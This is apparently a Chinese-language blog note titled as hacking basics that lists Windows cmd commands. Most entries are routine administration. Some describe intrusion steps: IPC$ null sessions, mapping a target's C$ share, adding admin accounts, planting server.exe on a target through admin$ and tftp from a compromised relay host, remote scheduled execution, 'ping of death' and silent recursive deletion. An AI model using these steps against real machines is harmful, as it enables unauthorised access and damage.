黑客基礎之 DOS命令(筆記1)mysql
cmd 篇sql
net use $">\\ip\ipc$ " " /user:" " 創建 IPC 空連接
net use $">\\ip\ipc$ "密碼" /user:"用戶名" 創建 IPC 非空連接
net use h: $">\\ip\c$ "密碼" /user:"用戶名" 直接登錄後映射對方 C:到本地爲 H:
net use h: $">\\ip\c$ 登錄後映射對方 C:到本地爲 H:
net use $">\\ip\ipc$ /del 刪除 IPC 連接
net use h: /del 刪除映射對方到本地的爲 H:的映射
net user 用戶名 密碼 /add 創建用戶
net user guest /active:yes 激活 guest 用戶
net user 查看有哪些用戶
net user 賬戶名 查看賬戶的屬性
net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具備管理員權限,(注意:administrator 後加 s 用複數)
windows
net start 查看開啓了哪些服務
net start 服務名 開啓服務;(如:net start telnet, net start schedule)
net stop 服務名 中止某服務;(如:net stop mysql57)
net time \\目標 ip 查看對方時間
net time \\目標 ip /set 設置本地計算機時間與「目標 IP」主機的時間同步,加上參數/yes 可取消確認信息
net view 查看本地局域網內開啓了哪些共享
net view \\ip 查看對方局域網內開啓了哪些共享緩存
net config 顯示系統網絡設置
net logoff 斷開鏈接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 局域網內正在使用的網絡鏈接類型和信息(這條命令爲啥不成功呢?net help裏沒有這條命令,求解 )
net share 查看本地開啓的共享
net share ipc$ 開啓 ipc$共享
net share ipc$ /del 刪除 ipc$共享
net share c$ /del 刪除 C:共享
net user guest 12345 用 guest 用戶登錄後用將密碼改成 12345
net password 密碼 更改系統登錄密碼
netstat -a 查看開啓了哪些端口,經常使用 netstat -an
netstat -n 查看端口的網絡鏈接狀況,經常使用 netstat -an
netstat -v 查看正在進行的工做服務器
netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用狀況(查看 tcp/ip 協議使用狀況)網絡
netstat -s 查看正在使用的全部協議使用狀況tcp
nbtstat -A ip 對方 136 到 139 其中一個端口開了的話,就可查看對方最近登錄的用戶名(03前的爲用戶名)-注意:參數-A 要大寫工具
tracert -參數 ip(或計算機名) 跟蹤路由(數據包),參數:「-w 數字」用於設置超時間隔。測試
ping ip(或域名) 向對方主機發送默認大小爲 32 字節的數據,參數:「-l[空格]數據大小」;「-n 發送數據次數」;「-t」指一直 ping。spa
ping -t -l 65550 ip 死亡之 ping(發送大於 64K 的文件並一直 ping 就成了死亡之 ping)
ipconfig (winipcfg) 用於 windows NT 及 XP(windows 95 98)查看本地 ip 地址,ipconfig可用參數「/all」顯示所有配置信息
tlist -t 以樹行列表顯示進程(爲系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools 文件夾內)
kill -F 進程名 加-F 參數後強制結束某進程(爲系統的附加工具,默認是沒有安裝 的,在安裝目錄的 Support/tools 文件夾內)
del -F 文件名 加-F 參數後就可刪除只讀文件,/AR、/AH、/AS、/AA 分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A 表示刪除除只讀、隱藏、系統、存檔之外的文件。例如「DEL/AR *.*」表示刪除當前目錄下全部只讀文件,「DEL/A-S *.*」表示刪除當前目錄下除系統文件之外的全部文件
del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S 刪除目錄及目錄下的全部子目錄和文件。同時使用參數/Q 可取消刪除操做時的系統確認就直接刪除。(二個命令做用相同)
move 盤符\路徑\要移動的文件名 存放移動文件的路徑\移動後文件名 移動文件,用參數/y
將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不一樣之處輸出到 3st.txt 文件中,"> "和"> >" 是重定向命令
at id 號 開啓已註冊的某個計劃任務
at /delete 中止全部計劃任務,用參數/yes 則不須要確認就直接中止
at id 號 /delete 中止某個已註冊的計劃任務
at 查看全部的計劃任務
at \\ip time 程序名(或一個命令) /r 在某時間運行對方某程序並從新啓動計算機
finger username @host 查看最近有哪些用戶登錄
telnet ip 端口 (或者telnet 域名 端口) 遠程和登錄服務器,默認端口爲 23
open ip 鏈接到 IP(屬 telnet 登錄後的命令)
telnet 在本機上直接鍵入 telnet 將進入本機的 telnet(注意:telnet默認是關閉的,要先配置telnet)
copy 路徑\文件名 1 路徑\文件名 2 /y 複製文件 1 到指定的目錄爲文件 2,用參數/y 就同時取消確認你要改寫一份現存目錄文件
copy c:\srv.exe $">\\ip\admin$ 複製本地 c:\srv.exe 到對方的 admin 下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將 2st.txt 的內容藏身到 1st.jpg 中生成 3st.jpg 新的文件,注:2st.txt 文件頭要空三排,參數:/b 指二進制文件,/a 指 ASCLL 格式文件
copy $\svv.exe">\\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 複製對方 admini$共享下的srv.exe 文件(全部文件)至本地 C:
xcopy 要複製的文件或目錄樹 目標地址\目錄名 複製文件和目錄樹,用參數/Y 將不提示覆蓋相同文件
tftp -i 本身 IP(用肉機做跳板時這用肉機 IP) get server.exe c:\server.exe 登錄後,將「IP」的
server.exe 下載到目標主機 c:\server.exe 參數:-i指以二進制模式傳送,如傳送 exe 文件時用,如不加-i 則以 ASCII 模式(傳送文本文件模式)進行傳送
tftp -i 對方 IP put c:\server.exe 登錄後,上傳本地 c:\server.exe 至主機
ftp ip 端口 用於上傳文件至服務器或進行文件操做,默認端口爲 21。bin 指用二進制方式傳送(可執行文件進);默認爲 ASCII 格式傳送(文本文件時)
route print 顯示出 IP 路由,將主要顯示網絡地址 Network addres,子網掩碼 Netmask,網關地址 Gateway addres,接口地址 Interface
arp 查看和處理 ARP 緩存,ARP 是名字解析的意思,負責把一個 IP 解析成一個物理性的 MAC地址。arp -a 將顯示出所有信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化(最小化)運行某程序或命令
mem 查看 cpu 使用狀況
attrib 文件名(目錄名) 查看某文件(目錄)的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔,只讀,系統,隱藏 屬
性;用+則是添加爲某屬性
dir 查看文件,參數:/Q 顯示文件及目錄屬系統哪一個用戶,/T:C 顯示文件建立時間,/T:A 顯示文件上次被訪問時間,/T:W 上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間,而沒必要輸入新日期和時間
set 指定環境變量名稱=要指派給變量的字符 設置環境變量
set 顯示當前全部的環境變量
set p(或其它字符) 顯示出當前以字符 p(或其它字符)開頭的全部環境變量
pause 暫停批處理程序,並顯示出:請按任意鍵繼續...
if 在批處理程序中執行條件處理(更多說明見 if 命令及變量)
goto 標籤 將cmd.exe導向到批處理程序中帶標籤的行(標籤必須單獨一行,且以冒號打頭,例如:「:start」標籤)
call 路徑\批處理文件名 從批處理程序中調用另外一個批處理程序 (更多說明見 call /?)
for 對一組文件中的每個文件執行某個特定命令(更多說明見 for 命令及變量)
echo on 或 off 打開或關閉 echo,僅用 echo 不加參數則顯示當前 echo 設置
echo 信息 在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到 pass.txt 文件中
findstr "Hello" aa.txt 在 aa.txt 文件中尋找字符串 hello
find 文件名 查找某文件
title 標題名字 更改 CMD 窗口標題名字
color 顏色值 設置 cmd 控制檯前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白(注:不區分大小寫)
prompt 名稱 更改 cmd.exe 的顯示的命令提示符(把 C:\、D:\統一改成:EntSky\ )
print 文件名 打印文本文件
ver 在 DOS 窗口下顯示版本信息
winver 彈出一個窗口顯示版本信息(內存大小、系統版本、補丁版本、計算機名)
format 盤符 /FS:類型 格式化磁盤,類型:FAT、FAT3二、NTFS ,例:Format D: /FS:NTFS
md 目錄名 建立目錄
replace 源文件 要替換文件的目錄 替換文件
ren 原文件名 新文件名 重命名文件名
tree 以樹形結構顯示出目錄,用參數-f 將列出第個文件夾中文件名稱
type 文件名 顯示文本文件的內容
more 文件名 逐屏顯示輸出文件
doskey 要鎖定的命令=字符
doskey 要解鎖命令= 爲 DOS提供的鎖定命令(編輯命令行,從新調用 win2k命令,並建立宏)。如:鎖定 dir 命令:doskey dir=entsky (不能用 doskey dir=dir);解鎖:doskey dir=
taskmgr 調出任務管理器
chkdsk /F D: 檢查磁盤 D 並顯示狀態報告;加參數/f 並修復磁盤上的錯誤
tlntadmn telnet 服務 admin,鍵入 tlntadmn 選擇 3,再選擇 8,就能夠更改 telnet 服務默認端口23 爲其它任何端口
exit 退出 cmd.exe 程序或目前,用參數/B 則是退出當前批處理腳本而不是 cmd.exe
path 路徑\可執行文件的文件名 爲可執行文件設置一個路徑。
cmd 啓動一個 win2K 命令解釋窗口。參數:/eff、/en 關閉、開啓命令擴展;更我詳細說明見 cmd /?
regedit /s 註冊表文件名 導入註冊表;參數/S 指安靜模式導入,無任何提示
regedit /e 註冊表文件名 導出註冊表
cacls 文件名 參數 顯示或修改文件訪問控制列表(ACL)——針對 NTFS 格式時。參數:/D 用戶名:設定拒絕某用戶訪問;/P 用戶名:perm 替換指定用戶的訪問權限;/G 用戶名:perm 賦予指定用戶訪問權限;Perm 能夠是: N 無,R 讀取, W 寫入, C 更改(寫入),F 徹底控制;例:cacls D:\test.txt /D pub 設定 d:\test.txt 拒絕 pub 用戶訪問。
cacls 文件名 查看文件的訪問用戶權限列表
REM 文本內容 在批處理文件中添加註解
netsh 查看或更改本地網絡配置狀況(具體使用請百度,這個我不咋滴使用)
補錄(經常使用):
systeminfo 查看系統信息
ipconfig /release 釋放ip
ipconfig /renew 從新得到ip
ipconfig /all 查看ip全部信息
arp -a 查看本機電腦全部ip和ip對應的Mac地址
net use k: \\192.168.1.1\c$ 映射,把該地址的c盤內容所有映射到本機電腦上的「k」盤上(k盤原先不存在,切記不要與本機硬盤上的盤符重複,這裏能夠把虛擬機上盤符映射到本機上來進行嘗試,前提是得能互相ping通)
net use k: \\192.168.1.1\c:$\del 同理,這個就是刪除了
DOS下某些命令提示出現不是內部和外部命令,也不是可運行程序或批處理文件的緣由(收集的):
1.DOS版本不支持,或者缺乏該程序文件
2.在系統屬性/高級/環境變量/Path/編輯/
加上%systemroot%;%systemroot%\system32
DOS命令很強大,咱們能夠用它來作不少事情。可是,有些時候在命令行窗口中打入一些DOS命令時,會提示「‘xxx’不是內部或外部命令,也不是可運行的程序或批處理文件。」這可能由如下幾個緣由形成的:
有可能安裝的系統是精簡版,cmd功能被去掉了,看看C:\windows\system32下有沒有那些DOS命令,若是有但使不了,那就有多是環境變量的問題,看看path裏有沒有%SystemRoot%;%SystemRoot%\system32;%SystemRoot%\system32\Wbem;……這一段(%SystemRoot%表明的就是系統安裝目錄-windows/winnt文件夾,後面接的system32和system32\wbem就是下面的文件夾,wbem文件夾用來存放WMI測試程序,用於查看和更改公共信息模型類、實例和方法等,屬於系統重要文件),那些外部的DOS命令文件都放在system32 文件夾下,若是在path中沒有上面的第二條,系統就找不到命令文件,也就執行不了命令了。若是環境變量沒問題但仍是使用不了,那就有可能系統壞了。
1.若是system32文件夾下沒有DOS命令文件,能夠從別人那裏拷過來用。(沒試過)
2.若是system32文件夾下有那些DOS命令文件,可是仍是用不了,看看環境變量有沒有system32文件的這個路徑,若是沒有就添加該路徑。
3.若是系統壞了,就修復windows吧。(C:\>sfc/scannow )sfc-SystemFileChecker「系統文件檢查器 (須要windows系統光盤進行修復)(DOS命令都不能用了,不知道sfc還能不能用!)
更多的還請本身百度,每一個人遇到的狀況都是不一樣的,本身去查才能真正的鍛鍊本身。。。